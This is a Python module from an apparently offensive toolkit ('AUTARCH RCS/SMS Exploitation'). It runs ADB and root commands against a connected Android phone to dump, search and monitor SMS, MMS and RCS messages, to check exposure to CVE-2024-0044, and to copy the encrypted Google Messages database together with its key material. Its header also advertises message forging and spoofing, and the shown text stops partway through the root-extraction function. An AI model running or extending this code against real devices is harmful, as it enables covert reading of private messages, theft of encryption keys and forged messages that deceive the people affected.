"""AUTARCH RCS/SMS Exploitation v2.0 Comprehensive RCS/SMS message extraction, forging, modification, and exploitation on connected Android devices via ADB content provider commands, Shizuku shell access, CVE-2024-0044 privilege escalation, AOSP RCS provider queries, and Archon app integration. All operations execute on the target phone — nothing runs locally except command dispatch and output parsing. IMPORTANT: The bugle_db (Google Messages RCS database) is encrypted at rest. The database uses SQLCipher or Android's encrypted SQLite APIs. To read it after extraction, you must ALSO extract the encryption key. Key locations: - shared_prefs/ XML files (key material or key alias) - Android Keystore (hardware-backed master key — requires app-UID or root) - /data/data/com.google.android.apps.messaging/files/ (session keys, config) Samsung devices add an additional proprietary encryption layer. Exploitation paths (in order of preference): 1. Content providers (UID 2000 / shell — no root needed, SMS/MMS only) 2. Archon app relay (READ_SMS + Shizuku → query via app context, bypasses encryption) 3. CVE-2024-0044 (Android 12-13 pre-Oct 2024 — full app-UID access, can read decrypted DB) 4. ADB backup (deprecated on Android 12+ but works on some devices) 5. Root (if available — can extract DB + keys) """ DESCRIPTION = "RCS/SMS Exploitation — Database extraction, forging, backup & spoofing" AUTHOR = "AUTARCH" VERSION = "2.0" CATEGORY = "offense" import os import re import csv import json import time import shlex import struct import sqlite3 import subprocess import threading import zlib from io import StringIO from pathlib import Path from datetime import datetime, timezone, timedelta from typing import Dict, List, Optional, Any, Tuple from xml.etree import ElementTree as ET try: from core.paths import find_tool, get_data_dir except ImportError: import shutil as _sh def find_tool(name): return _sh.which(name) def get_data_dir(): return Path(__file__).resolve().parent.parent / 'data' # ── Module-level singleton ────────────────────────────────────────────────── _instance: Optional['RCSTools'] = None def get_rcs_tools() -> 'RCSTools': global _instance if _instance is None: _instance = RCSTools() return _instance # ── Constants ──────────────────────────────────────────────────────────────── # Standard Android telephony content providers (accessible at UID 2000) SMS_URI = 'content://sms/' SMS_INBOX_URI = 'content://sms/inbox' SMS_SENT_URI = 'content://sms/sent' SMS_DRAFT_URI = 'content://sms/draft' SMS_OUTBOX_URI = 'content://sms/outbox' MMS_URI = 'content://mms/' MMS_INBOX_URI = 'content://mms/inbox' MMS_SENT_URI = 'content://mms/sent' MMS_PART_URI = 'content://mms/part' MMS_SMS_CONVERSATIONS_URI = 'content://mms-sms/conversations' MMS_SMS_DRAFT_URI = 'content://mms-sms/draft' MMS_SMS_UNDELIVERED_URI = 'content://mms-sms/undelivered' MMS_SMS_LOCKED_URI = 'content://mms-sms/locked' # AOSP RCS content provider (authority: "rcs") RCS_THREAD_URI = 'content://rcs/thread' RCS_P2P_THREAD_URI = 'content://rcs/p2p_thread' RCS_GROUP_THREAD_URI = 'content://rcs/group_thread' RCS_PARTICIPANT_URI = 'content://rcs/participant' RCS_MESSAGE_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/message' RCS_FILE_TRANSFER_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/file_transfer' RCS_INCOMING_MSG_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/incoming_message' RCS_OUTGOING_MSG_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/outgoing_message' # Google Messages proprietary providers (may require elevated access) GMSGS_PROVIDER = 'content://com.google.android.apps.messaging.datamodel.MessagingContentProvider' # All known RCS-related content provider URIs to enumerate ALL_RCS_URIS = [ 'content://rcs/thread', 'content://rcs/p2p_thread', 'content://rcs/group_thread', 'content://rcs/participant', 'content://im/messages/', 'content://com.google.android.apps.messaging/messages', 'content://com.google.android.apps.messaging.datamodel.MessagingContentProvider', 'content://com.google.android.ims.provider/', 'content://com.google.android.gms.ims.provider/', 'content://com.google.android.rcs.provider/', 'content://com.samsung.android.messaging/', 'content://com.samsung.rcs.autoconfigurationprovider/root/*', ] # SMS type codes (android.provider.Telephony.Sms constants) MSG_TYPE_ALL = 0 MSG_TYPE_INBOX = 1 # received MSG_TYPE_SENT = 2 # sent MSG_TYPE_DRAFT = 3 MSG_TYPE_OUTBOX = 4 MSG_TYPE_FAILED = 5 MSG_TYPE_QUEUED = 6 # MMS message box codes MMS_BOX_INBOX = 1 MMS_BOX_SENT = 2 MMS_BOX_DRAFT = 3 MMS_BOX_OUTBOX = 4 # bugle_db message_protocol values PROTOCOL_SMS = 0 PROTOCOL_MMS = 1 PROTOCOL_RCS = 2 # Google proprietary — values >= 2 indicate RCS # bugle_db paths on device BUGLE_DB_PATHS = [ '/data/data/com.google.android.apps.messaging/databases/bugle_db', '/data/user/0/com.google.android.apps.messaging/databases/bugle_db', '/data/data/com.android.messaging/databases/bugle_db', ] # Telephony provider database MMSSMS_DB_PATHS = [ '/data/data/com.android.providers.telephony/databases/mmssms.db', '/data/user_de/0/com.android.providers.telephony/databases/mmssms.db', ] # Samsung messaging databases SAMSUNG_DB_PATHS = [ '/data/data/com.samsung.android.messaging/databases/', '/data/data/com.sec.android.provider.logsprovider/databases/logs.db', ] # Known messaging packages MESSAGING_PACKAGES = [ 'com.google.android.apps.messaging', # Google Messages 'com.android.messaging', # AOSP Messages 'com.samsung.android.messaging', # Samsung Messages 'com.verizon.messaging.vzmsgs', # Verizon Message+ ] # Column projections SMS_COLUMNS = '_id:thread_id:address:body:date:date_sent:type:read:status:protocol:service_center:person:subject:locked:seen' MMS_COLUMNS = '_id:thread_id:date:msg_box:sub:sub_cs:ct_l:exp:m_type:read:seen:st' MMS_PART_COLUMNS = '_id:mid:ct:text:_data:name' # Known CVEs affecting RCS/Android messaging RCS_CVES = { 'CVE-2023-24033': { 'severity': 'critical', 'cvss': 9.8, 'desc': 'Samsung Exynos baseband RCE via RCS SDP accept-type parsing', 'affected': 'Exynos 5123, 5300, 980, 1080, Auto T5123', 'type': 'zero-click', 'discoverer': 'Google Project Zero', 'mitigation': 'Disable Wi-Fi calling and VoLTE; apply March 2023 patches', }, 'CVE-2024-0044': { 'severity': 'high', 'cvss': 7.8, 'desc': 'Android run-as privilege escalation via newline injection in PackageInstallerService', 'affected': 'Android 12-13 pre-October 2024 security patch', 'type': 'local', 'discoverer': 'Meta Red Team X', 'mitigation': 'Apply October 2024 security patch', 'exploit_available': True, }, 'CVE-2024-31317': { 'severity': 'high', 'cvss': 7.8, 'desc': 'Android system_server run-as bypass via command injection', 'affected': 'Android 12-14 pre-QPR2', 'type': 'local', 'discoverer': 'Meta Red Team X', 'mitigation': 'Apply June 2024 security patch', }, 'CVE-2024-49415': { 'severity': 'high', 'cvss': 8.1, 'desc': 'Samsung libsaped.so zero-click RCE via RCS audio message (OOB write in APE decoder)', 'affected': 'Samsung Galaxy S23/S24 Android 12-14 pre-December 2024', 'type': 'zero-click', 'discoverer': 'Natalie Silvanovich (Project Zero)', 'mitigation': 'Apply December 2024 Samsung security patch', }, 'CVE-2025-48593': { 'severity': 'critical', 'cvss': 9.8, 'desc': 'Android System component zero-click RCE', 'affected': 'Android 13, 14, 15, 16', 'type': 'zero-click', 'discoverer': 'Android Security Team', 'mitigation': 'Apply November 2025 security patch', }, 'CVE-2017-0780': { 'severity': 'medium', 'cvss': 5.5, 'desc': 'Android Messages crash via crafted message (DoS)', 'affected': 'Android 4.4-8.0', 'type': 'remote', 'discoverer': 'Trend Micro', 'mitigation': 'Update to patched Android version', }, } # Phenotype flags for Google Messages debug/verbose logging PHENOTYPE_FLAGS = { 'verbose_bug_reports': 'bugle_phenotype__enable_verbose_bug_reports', 'rcs_diagnostics': 'bugle_phenotype__enable_rcs_diagnostics', 'debug_mode': 'bugle_phenotype__enable_debug_mode', } # Enterprise archival broadcast ARCHIVAL_BROADCAST_ACTION = 'GOOGLE_MESSAGES_ARCHIVAL_UPDATE' ARCHIVAL_URI_EXTRA = 'com.google.android.apps.messaging.EXTRA_ARCHIVAL_URI' # ── RCSTools Class ─────────────────────────────────────────────────────────── class RCSTools: """Comprehensive RCS/SMS exploitation via ADB.""" def __init__(self): self._adb_path: Optional[str] = None self._data_dir: Path = Path(get_data_dir()) / 'rcs_tools' self._data_dir.mkdir(parents=True, exist_ok=True) self._backups_dir: Path = self._data_dir / 'backups' self._backups_dir.mkdir(parents=True, exist_ok=True) self._exports_dir: Path = self._data_dir / 'exports' self._exports_dir.mkdir(parents=True, exist_ok=True) self._extracted_dir: Path = self._data_dir / 'extracted_dbs' self._extracted_dir.mkdir(parents=True, exist_ok=True) self._monitor_thread: Optional[threading.Thread] = None self._monitor_running = False self._intercepted: List[Dict[str, Any]] = [] self._intercepted_lock = threading.Lock() self._forged_log: List[Dict[str, Any]] = [] self._cve_exploit_active = False self._exploit_victim_name: Optional[str] = None # ══════════════════════════════════════════════════════════════════════ # §1 ADB HELPERS # ══════════════════════════════════════════════════════════════════════ def _get_adb(self) -> str: if self._adb_path is None: self._adb_path = find_tool('adb') if not self._adb_path: raise RuntimeError('adb not found') return self._adb_path def _run_adb(self, command: str, timeout: int = 30) -> str: adb = self._get_adb() full_cmd = f'{adb} {command}' try: result = subprocess.run( full_cmd, shell=True, capture_output=True, text=True, timeout=timeout, ) if result.returncode != 0 and result.stderr.strip(): return f'[adb error] {result.stderr.strip()}' return result.stdout.strip() except subprocess.TimeoutExpired: return f'[adb error] Command timed out after {timeout}s' except Exception as e: return f'[adb error] {e}' def _run_adb_binary(self, command: str, timeout: int = 60) -> Optional[bytes]: adb = self._get_adb() full_cmd = f'{adb} {command}' try: result = subprocess.run( full_cmd, shell=True, capture_output=True, timeout=timeout, ) if result.returncode != 0: return None return result.stdout except Exception: return None def _run_shizuku(self, command: str, timeout: int = 30) -> str: escaped = command.replace("'", "'\\''") return self._run_adb(f"shell sh -c '{escaped}'", timeout=timeout) def _shell(self, command: str, timeout: int = 30) -> str: return self._run_adb(f'shell {command}', timeout=timeout) def _content_query(self, uri: str, projection: str = '', where: str = '', sort: str = '', limit: int = 0) -> List[Dict[str, str]]: # Build shell command — use single quotes for sort/where to avoid # Windows double-quote stripping issues cmd = f'shell content query --uri {uri}' if projection: cmd += f' --projection {projection}' if where: cmd += f" --where '{where}'" if sort: cmd += f" --sort '{sort}'" output = self._run_adb(cmd, timeout=30) rows = self._parse_content_query(output) if limit > 0: rows = rows[:limit] return rows def _content_insert(self, uri: str, bindings: Dict[str, Any]) -> str: cmd = f'shell content insert --uri {uri}' for key, val in bindings.items(): if val is None: cmd += f' --bind {key}:s:NULL' elif isinstance(val, int): cmd += f' --bind {key}:i:{val}' elif isinstance(val, float): cmd += f' --bind {key}:f:{val}' else: safe = str(val).replace("'", "'\\''") cmd += f" --bind {key}:s:'{safe}'" return self._run_adb(cmd) def _content_update(self, uri: str, bindings: Dict[str, Any], where: str = '') -> str: cmd = f'shell content update --uri {uri}' for key, val in bindings.items(): if val is None: cmd += f' --bind {key}:s:NULL' elif isinstance(val, int): cmd += f' --bind {key}:i:{val}' else: safe = str(val).replace("'", "'\\''") cmd += f" --bind {key}:s:'{safe}'" if where: cmd += f' --where "{where}"' return self._run_adb(cmd) def _content_delete(self, uri: str, where: str = '') -> str: cmd = f'shell content delete --uri {uri}' if where: cmd += f' --where "{where}"' return self._run_adb(cmd) def _parse_content_query(self, output: str) -> List[Dict[str, str]]: rows = [] if not output or output.startswith('[adb error]'): return rows for line in output.splitlines(): line = line.strip() if not line.startswith('Row:'): continue match = re.match(r'Row:\s*\d+\s+(.*)', line) if not match: continue payload = match.group(1) row = {} parts = re.split(r',\s+(?=[a-zA-Z_]+=)', payload) for part in parts: eq_pos = part.find('=') if eq_pos == -1: continue key = part[:eq_pos].strip() val = part[eq_pos + 1:].strip() if val == 'NULL': val = None row[key] = val if row: rows.append(row) return rows def _is_error(self, output: str) -> bool: return output.startswith('[adb error]') if output else True def _ts_ms(self, dt: Optional[datetime] = None) -> int: if dt is None: dt = datetime.now(timezone.utc) return int(dt.timestamp() * 1000) def _format_ts(self, ts_ms) -> str: try: ts = int(ts_ms) / 1000 return datetime.fromtimestamp(ts, tz=timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC') except (ValueError, TypeError, OSError): return str(ts_ms) # ══════════════════════════════════════════════════════════════════════ # §2 DEVICE CONNECTION & STATUS # ══════════════════════════════════════════════════════════════════════ def get_connected_device(self) -> Dict[str, Any]: output = self._run_adb('devices') devices = [] for line in output.splitlines(): line = line.strip() if line and not line.startswith('List') and not line.startswith('*'): parts = line.split('\t') if len(parts) >= 2: devices.append({'serial': parts[0], 'state': parts[1]}) if not devices: return {'connected': False, 'error': 'No devices connected'} for d in devices: if d['state'] == 'device': return {'connected': True, 'serial': d['serial'], 'state': 'device'} return {'connected': False, 'error': f'Device state: {devices[0]["state"]}'} def get_device_info(self) -> Dict[str, Any]: dev = self.get_connected_device() if not dev.get('connected'): return dev info = { 'connected': True, 'serial': dev['serial'], 'model': self._shell('getprop ro.product.model'), 'manufacturer': self._shell('getprop ro.product.manufacturer'), 'android_version': self._shell('getprop ro.build.version.release'), 'sdk_version': self._shell('getprop ro.build.version.sdk'), 'security_patch': self._shell('getprop ro.build.version.security_patch'), 'build_id': self._shell('getprop ro.build.display.id'), 'brand': self._shell('getprop ro.product.brand'), 'device': self._shell('getprop ro.product.device'), 'is_pixel': 'pixel' in self._shell('getprop ro.product.brand').lower() or 'google' in self._shell('getprop ro.product.manufacturer').lower(), 'is_samsung': 'samsung' in self._shell('getprop ro.product.manufacturer').lower(), } # Check default SMS app sms_app = self._shell('settings get secure sms_default_application') info['default_sms_app'] = sms_app if not self._is_error(sms_app) else 'unknown' return info def get_status(self) -> Dict[str, Any]: dev = self.get_device_info() if not dev.get('connected'): return {'ok': False, 'connected': False, 'error': dev.get('error', 'Not connected')} # Check Shizuku shizuku = self.check_shizuku_status() # Check Archon archon = self.check_archon_installed() # Check CVE vulnerability cve_status = self.check_cve_2024_0044() return { 'ok': True, 'connected': True, 'device': dev, 'shizuku': shizuku, 'archon': archon, 'cve_2024_0044': cve_status, 'exploit_active': self._cve_exploit_active, 'monitor_running': self._monitor_running, 'intercepted_count': len(self._intercepted), 'forged_count': len(self._forged_log), } def check_shizuku_status(self) -> Dict[str, Any]: # Check if Shizuku is installed pm_output = self._shell('pm list packages moe.shizuku.privileged.api') installed = 'moe.shizuku.privileged.api' in pm_output if not self._is_error(pm_output) else False if not installed: pm_output = self._shell('pm list packages rikka.shizuku') installed = 'rikka.shizuku' in pm_output if not self._is_error(pm_output) else False # Check if Shizuku service is running running = False if installed: ps_out = self._shell('ps -A | grep shizuku') running = bool(ps_out and not self._is_error(ps_out) and 'shizuku' in ps_out.lower()) return {'installed': installed, 'running': running, 'uid': 2000 if running else None} def check_archon_installed(self) -> Dict[str, Any]: pm_output = self._shell('pm list packages com.darkhal.archon') installed = 'com.darkhal.archon' in pm_output if not self._is_error(pm_output) else False result = {'installed': installed} if installed: # Check version dump = self._shell('dumpsys package com.darkhal.archon | grep versionName') if dump and not self._is_error(dump): m = re.search(r'versionName=(\S+)', dump) if m: result['version'] = m.group(1) # Check if Archon has messaging/RCS permissions perms = self._shell('dumpsys package com.darkhal.archon | grep "android.permission.READ_SMS"') result['has_sms_permission'] = 'granted=true' in perms if perms else False perms2 = self._shell('dumpsys package com.darkhal.archon | grep "android.permission.READ_CONTACTS"') result['has_contacts_permission'] = 'granted=true' in perms2 if perms2 else False return result def get_security_patch_level(self) -> Dict[str, Any]: patch = self._shell('getprop ro.build.version.security_patch') android_ver = self._shell('getprop ro.build.version.release') sdk = self._shell('getprop ro.build.version.sdk') result = { 'security_patch': patch, 'android_version': android_ver, 'sdk_version': sdk, } # Check if CVE-2024-0044 is exploitable try: sdk_int = int(sdk) if sdk_int in (31, 32, 33): # Android 12, 12L, 13 if patch and patch < '2024-10-01': result['cve_2024_0044_vulnerable'] = True else: result['cve_2024_0044_vulnerable'] = False else: result['cve_2024_0044_vulnerable'] = False except (ValueError, TypeError): result['cve_2024_0044_vulnerable'] = False return result def get_default_sms_app(self) -> Dict[str, Any]: app = self._shell('settings get secure sms_default_application') if self._is_error(app): return {'ok': False, 'error': app} return {'ok': True, 'package': app} def set_default_sms_app(self, package: str) -> Dict[str, Any]: # Verify package exists pm = self._shell(f'pm list packages {shlex.quote(package)}') if package not in pm: return {'ok': False, 'error': f'Package {package} not found'} result = self._shell(f'settings put secure sms_default_application {shlex.quote(package)}') if self._is_error(result) and result: return {'ok': False, 'error': result} return {'ok': True, 'message': f'Default SMS app set to {package}'} # ══════════════════════════════════════════════════════════════════════ # §3 IMS/RCS DIAGNOSTICS # ══════════════════════════════════════════════════════════════════════ def get_ims_status(self) -> Dict[str, Any]: output = self._shell('dumpsys telephony_ims') if self._is_error(output): # Try alternate service name output = self._shell('dumpsys telephony.registry') if self._is_error(output): return {'ok': False, 'error': 'Cannot query IMS status'} lines = output.splitlines() result = {'ok': True, 'raw': output[:5000]} for line in lines: line_l = line.strip().lower() if 'registered' in line_l and 'ims' in line_l: result['ims_registered'] = 'true' in line_l or 'yes' in line_l if 'rcs' in line_l and ('enabled' in line_l or 'connected' in line_l): result['rcs_enabled'] = True if 'volte' in line_l and 'enabled' in line_l: result['volte_enabled'] = True return result def get_carrier_config(self) -> Dict[str, Any]: output = self._shell('dumpsys carrier_config') if self._is_error(output): return {'ok': False, 'error': output} rcs_keys = {} for line in output.splitlines(): line = line.strip() if any(k in line.lower() for k in ['rcs', 'ims', 'uce', 'presence', 'single_registration']): if '=' in line: key, _, val = line.partition('=') rcs_keys[key.strip()] = val.strip() return {'ok': True, 'rcs_config': rcs_keys, 'raw_length': len(output)} def get_rcs_registration_state(self) -> Dict[str, Any]: # Check Google Messages RCS state via dumpsys output = self._shell('dumpsys activity service com.google.android.apps.messaging') rcs_state = 'unknown' if output and not self._is_error(output): for line in output.splitlines(): if 'rcs' in line.lower() and ('state' in line.lower() or 'connected' in line.lower()): rcs_state = line.strip() break # Also try carrier_services cs_output = self._shell('dumpsys activity service com.google.android.ims') cs_state = 'unknown' if cs_output and not self._is_error(cs_output): for line in cs_output.splitlines(): if 'provisioned' in line.lower() or 'registered' in line.lower(): cs_state = line.strip() break return { 'ok': True, 'messages_rcs_state': rcs_state, 'carrier_services_state': cs_state, } def enable_verbose_logging(self) -> Dict[str, Any]: results = {} # Set Phenotype flag for verbose bug reports (no root needed) for name, flag in PHENOTYPE_FLAGS.items(): cmd = ( f'shell am broadcast ' f"-a 'com.google.android.gms.phenotype.FLAG_OVERRIDE' " f'--es package "com.google.android.apps.messaging#com.google.android.apps.messaging" ' f'--es user "\\*" ' f'--esa flags "{flag}" ' f'--esa values "true" ' f'--esa types "boolean" ' f'com.google.android.gms' ) out = self._run_adb(cmd) results[name] = 'success' if 'Broadcast completed' in out else out # Try setting log tags (may require root) log_tags = ['Bugle', 'BugleDataModel', 'BugleRcs', 'BugleRcsEngine', 'RcsProvisioning', 'CarrierServices', 'BugleTransport'] for tag in log_tags: self._shell(f'setprop log.tag.{tag} VERBOSE') results['log_tags'] = 'attempted (may require root)' return {'ok': True, 'results': results} def capture_rcs_logs(self, duration: int = 10) -> Dict[str, Any]: # Clear logcat first self._shell('logcat -c') # Capture filtered logs tags = 'Bugle:V BugleRcs:V RcsProvisioning:V CarrierServices:V BugleRcsEngine:V *:S' output = self._run_adb(f'shell logcat -d -s {tags}', timeout=duration + 5) if self._is_error(output): return {'ok': False, 'error': output} lines = output.splitlines() return {'ok': True, 'lines': lines[:500], 'total_lines': len(lines)} # ══════════════════════════════════════════════════════════════════════ # §4 CONTENT PROVIDER EXTRACTION (no root needed) # ══════════════════════════════════════════════════════════════════════ def read_sms_database(self, limit: int = 200) -> List[Dict[str, Any]]: rows = self._content_query(SMS_URI, projection=SMS_COLUMNS, limit=limit) for row in rows: if row.get('date'): row['date_formatted'] = self._format_ts(row['date']) row['protocol_name'] = 'SMS' msg_type = int(row.get('type', 0)) row['direction'] = 'incoming' if msg_type == MSG_TYPE_INBOX else 'outgoing' return rows def read_sms_inbox(self, limit: int = 100) -> List[Dict[str, Any]]: return self._content_query(SMS_INBOX_URI, projection=SMS_COLUMNS, limit=limit) def read_sms_sent(self, limit: int = 100) -> List[Dict[str, Any]]: return self._content_query(SMS_SENT_URI, projection=SMS_COLUMNS, limit=limit) def read_mms_database(self, limit: int = 100) -> List[Dict[str, Any]]: rows = self._content_query(MMS_URI, projection=MMS_COLUMNS, limit=limit) # Enrich with parts (body text) for row in rows: mms_id = row.get('_id') if mms_id: parts = self._content_query( f'content://mms/{mms_id}/part', projection=MMS_PART_COLUMNS, ) row['parts'] = parts # Extract text body from parts for p in parts: if p.get('ct') == 'text/plain' and p.get('text'): row['body'] = p['text'] break if row.get('date'): row['date_formatted'] = self._format_ts(int(row['date']) * 1000) return rows def read_rcs_via_mms(self, thread_id: Optional[int] = None, limit: int = 200) -> List[Dict[str, Any]]: """Read RCS messages via the MMS content provider. DISCOVERY: Google Messages writes ALL RCS messages to content://mms/ as MMS records. The message body is in content://mms/{id}/part (ct=text/plain). RCS metadata (group name, SIP conference URI) is protobuf-encoded in the tr_id field. Sender addresses are in content://mms/{id}/addr. This works on ANY Android with ADB access (UID 2000) — no root, no exploits, no Shizuku needed. Tested on Pixel 10 Pro Fold, Android 16, February 2026 patch. """ # Get MMS entries (which include RCS messages synced by Google Messages) where = f'thread_id={thread_id}' if thread_id else '' mms_rows = self._content_query( MMS_URI, projection='_id:thread_id:date:msg_box:sub:text_only:tr_id', where=where, sort='date DESC', limit=limit, ) messages = [] for row in mms_rows: mms_id = row.get('_id') if not mms_id: continue msg = { '_id': mms_id, 'thread_id': row.get('thread_id'), 'date': row.get('date'), 'msg_box': row.get('msg_box'), 'direction': 'incoming' if row.get('msg_box') == '1' else 'outgoing', 'tr_id': row.get('tr_id', ''), 'is_rcs': False, 'body': '', 'addresses': [], } # Check if this is an RCS message (tr_id starts with "proto:") tr_id = row.get('tr_id', '') or '' if tr_id.startswith('proto:'): msg['is_rcs'] = True msg['protocol_name'] = 'RCS' # Try to decode group/conversation name from protobuf msg['rcs_metadata'] = tr_id[:100] else: msg['protocol_name'] = 'MMS' # Get message body from parts parts = self._content_query( f'content://mms/{mms_id}/part', projection='_id:ct:text', ) for p in parts: if p.get('ct') == 'text/plain' and p.get('text'): msg['body'] = p['text'] break # Get sender/recipient addresses addrs = self._content_query( f'content://mms/{mms_id}/addr', projection='address:type', ) for a in addrs: addr = a.get('address', '') addr_type = a.get('type', '') if addr and addr != 'insert-address-token': msg['addresses'].append({'address': addr, 'type': addr_type}) # Type 137 = FROM, 151 = BCC/self, 130 = TO if addr_type == '137': msg['sender'] = addr # Format timestamp (MMS dates are in seconds, not ms) if msg['date']: try: ts = int(msg['date']) if ts < 10000000000: # seconds ts *= 1000 msg['date_ms'] = ts msg['date_formatted'] = self._format_ts(ts) except (ValueError, TypeError): pass messages.append(msg) return messages def read_rcs_only(self, limit: int = 200) -> List[Dict[str, Any]]: """Read ONLY RCS messages (filter MMS entries with proto: in tr_id).""" all_mms = self.read_rcs_via_mms(limit=limit * 2) return [m for m in all_mms if m.get('is_rcs')][:limit] def read_rcs_threads(self) -> List[Dict[str, Any]]: """Get unique RCS conversation threads with latest message.""" all_rcs = self.read_rcs_via_mms(limit=5000) threads = {} for msg in all_rcs: tid = msg.get('thread_id') if tid and tid not in threads: threads[tid] = { 'thread_id': tid, 'latest_message': msg.get('body', '')[:100], 'latest_date': msg.get('date_formatted', ''), 'is_rcs': msg.get('is_rcs', False), 'direction': msg.get('direction'), 'addresses': msg.get('addresses', []), 'message_count': 0, } if tid in threads: threads[tid]['message_count'] += 1 return list(threads.values()) def read_conversations(self, limit: int = 100) -> List[Dict[str, Any]]: rows = self._content_query(MMS_SMS_CONVERSATIONS_URI, limit=limit) return rows def read_draft_messages(self) -> List[Dict[str, Any]]: return self._content_query(MMS_SMS_DRAFT_URI) def read_undelivered_messages(self) -> List[Dict[str, Any]]: return self._content_query(MMS_SMS_UNDELIVERED_URI) def read_locked_messages(self) -> List[Dict[str, Any]]: return self._content_query(MMS_SMS_LOCKED_URI) def read_rcs_provider(self) -> Dict[str, Any]: """Query the AOSP RCS content provider (content://rcs/).""" results = {} # Threads threads = self._content_query(RCS_THREAD_URI) results['threads'] = threads results['thread_count'] = len(threads) # P2P threads p2p = self._content_query(RCS_P2P_THREAD_URI) results['p2p_threads'] = p2p # Group threads groups = self._content_query(RCS_GROUP_THREAD_URI) results['group_threads'] = groups # Participants participants = self._content_query(RCS_PARTICIPANT_URI) results['participants'] = participants results['ok'] = True return results def read_rcs_messages(self, thread_id: Optional[int] = None) -> List[Dict[str, Any]]: """Read RCS messages from AOSP RCS provider.""" if thread_id: uri = RCS_MESSAGE_URI_FMT.format(thread_id=thread_id) else: # Try querying all threads and getting messages from each threads = self._content_query(RCS_THREAD_URI) all_msgs = [] for t in threads: tid = t.get('rcs_thread_id') if tid: msgs = self._content_query( RCS_MESSAGE_URI_FMT.format(thread_id=tid) ) for m in msgs: m['thread_id'] = tid all_msgs.extend(msgs) return all_msgs return self._content_query(uri) def read_rcs_participants(self) -> List[Dict[str, Any]]: return self._content_query(RCS_PARTICIPANT_URI) def read_rcs_file_transfers(self, thread_id: int) -> List[Dict[str, Any]]: uri = RCS_FILE_TRANSFER_URI_FMT.format(thread_id=thread_id) return self._content_query(uri) def get_thread_messages(self, thread_id: int, limit: int = 200) -> List[Dict[str, Any]]: rows = self._content_query( SMS_URI, projection=SMS_COLUMNS, where=f'thread_id={thread_id}', limit=limit, ) for row in rows: if row.get('date'): row['date_formatted'] = self._format_ts(row['date']) return rows def get_messages_by_address(self, address: str, limit: int = 200) -> List[Dict[str, Any]]: safe_addr = address.replace("'", "''") rows = self._content_query( SMS_URI, projection=SMS_COLUMNS, where=f"address='{safe_addr}'", limit=limit, ) for row in rows: if row.get('date'): row['date_formatted'] = self._format_ts(row['date']) return rows def search_messages(self, keyword: str, limit: int = 100) -> List[Dict[str, Any]]: safe_kw = keyword.replace("'", "''").replace('%', '\\%') rows = self._content_query( SMS_URI, projection=SMS_COLUMNS, where=f"body LIKE '%{safe_kw}%'", limit=limit, ) for row in rows: if row.get('date'): row['date_formatted'] = self._format_ts(row['date']) return rows def enumerate_providers(self) -> Dict[str, Any]: """Scan all known messaging content providers and report which are accessible.""" accessible = [] blocked = [] for uri in ALL_RCS_URIS: out = self._run_adb(f'shell content query --uri {uri}', timeout=5) if self._is_error(out) or 'Permission Denial' in out or 'SecurityException' in out: blocked.append({'uri': uri, 'error': out[:200] if out else 'no response'}) elif 'No result found' in out: accessible.append({'uri': uri, 'status': 'accessible', 'rows': 0}) else: row_count = out.count('Row:') accessible.append({'uri': uri, 'status': 'has_data', 'rows': row_count}) # Also check standard SMS/MMS for uri_name, uri in [('SMS', SMS_URI), ('MMS', MMS_URI), ('Conversations', MMS_SMS_CONVERSATIONS_URI)]: out = self._run_adb(f'shell content query --uri {uri}', timeout=5) if not self._is_error(out) and 'Permission' not in out: row_count = out.count('Row:') accessible.append({'uri': uri, 'status': 'has_data', 'rows': row_count, 'name': uri_name}) return { 'ok': True, 'accessible': accessible, 'blocked': blocked, 'total_accessible': len(accessible), 'total_blocked': len(blocked), } # ══════════════════════════════════════════════════════════════════════ # §5 BUGLE_DB DIRECT EXTRACTION # ══════════════════════════════════════════════════════════════════════ def extract_bugle_db(self) -> Dict[str, Any]: """Extract Google Messages bugle_db using best available method. IMPORTANT: bugle_db is ENCRYPTED at rest (SQLCipher / Android encrypted SQLite). Extracting the raw .db file alone is not enough — you also need the encryption key. Key is stored in shared_prefs or Android Keystore. Best approach: Use Archon relay to query the DB from within the app context (already decrypted in memory) or use CVE-2024-0044 to run as the messaging app UID (which can open the DB with the app's key). We also extract shared_prefs/ and files/ directories to capture key material alongside the database. The WAL file (bugle_db-wal) may contain recent messages not yet checkpointed. """ dev = self.get_connected_device() if not dev.get('connected'): return {'ok': False, 'error': 'No device connected'} timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') extract_dir = self._extracted_dir / timestamp extract_dir.mkdir(parents=True, exist_ok=True) # Method 1: Try Archon app relay (if installed and has permissions) # Best method — Archon queries from within app context where DB is decrypted archon = self.check_archon_installed() if archon.get('installed') and archon.get('has_sms_permission'): result = self._extract_via_archon(extract_dir) if result.get('ok'): return result # Method 2: Try CVE-2024-0044 (if vulnerable) # Runs as messaging app UID — can open encrypted DB with app's key cve = self.check_cve_2024_0044() if cve.get('vulnerable'): result = self._extract_via_cve(extract_dir) if result.get('ok'): return result # Method 3: Try root direct pull (DB + keys) root_check = self._shell('id') if 'uid=0' in root_check: result = self._extract_via_root(extract_dir) if result.get('ok'): return result # Method 4: Try adb backup result = self._extract_via_adb_backup(extract_dir) if result.get('ok'): return result # Method 5: Content provider fallback (SMS/MMS only, not full bugle_db) return { 'ok': False, 'error': 'Cannot extract bugle_db directly. The database is encrypted ' 'at rest — raw file extraction requires the encryption key. ' 'Best methods: ' '(1) Archon relay (queries from decrypted app context), ' '(2) CVE-2024-0044 (runs as app UID, can open encrypted DB), ' '(3) Root (extract DB + key material from shared_prefs/Keystore), ' '(4) Content providers for SMS/MMS only (already decrypted).', 'fallback': 'content_providers', } def _extract_via_root(self, extract_dir: Path) -> Dict[str, Any]: """Extract bugle_db + encryption key material via root access. The database is encrypted at rest. We pull: - bugle_db, bugle_db-wal, bugle_db-shm (encrypted database + WAL) - shared_prefs/ (may contain key alias or key material) - files/ directory (Signal Protocol state, config) """ for db_path in BUGLE_DB_PATHS: check = self._shell(f'su -c "ls {db_path}" 2>/dev/null') if not self._is_error(check) and 'No such file' not in check: app_dir = str(Path(db_path).parent.parent) # /data/data/com.google.android.apps.messaging staging = '/data/local/tmp/autarch_extract' self._shell(f'su -c "mkdir -p {staging}/shared_prefs {staging}/files"') # Copy database files for suffix in ['', '-wal', '-shm', '-journal']: src = f'{db_path}{suffix}' self._shell(f'su -c "cp {src} {staging}/ 2>/dev/null"') self._shell(f'su -c "chmod 644 {staging}/{os.path.basename(src)}"') # Copy shared_prefs (encryption key material) 